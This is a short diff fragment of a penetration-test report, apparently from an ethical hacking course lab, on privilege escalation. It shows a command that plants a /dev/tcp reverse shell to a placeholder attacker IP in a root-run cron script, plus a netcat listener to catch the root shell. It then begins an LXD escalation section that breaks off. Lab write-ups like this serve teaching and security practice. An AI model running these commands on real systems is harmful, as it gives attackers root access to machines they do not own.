Owanesh/ETH2324/phase_2/REPORT.md

  ```sh
 echo "sh -i >& /dev/tcp/[attacker_ip]/[attacker_port] 0>&1" > /usr/local/apache24/scripts/health_check.sh
 ```
-Then waiting 1 minute on average for the cron to execute the command and attach to ourselves on the other side on a trusty netcat listener
+Then waiting 1 minute on average for the cron to execute the command and attach to ourselves on the other side on a trusty netcat listener.

 ```sh
 nc -lnvp 7777
 ```
 Since the file is executed as root, the shell will be a root shell.

-## 🔴 via LXD
+## [HRD] via LXD
 We noticed the presence of `lxd` from `/etc/passwd`, so we tried exploiting it.
 We could think about mounting the file system with `root` privileges, but it would require to be `sudoer`.
 Thankfully, the `ubuntu` user is.

 ```sh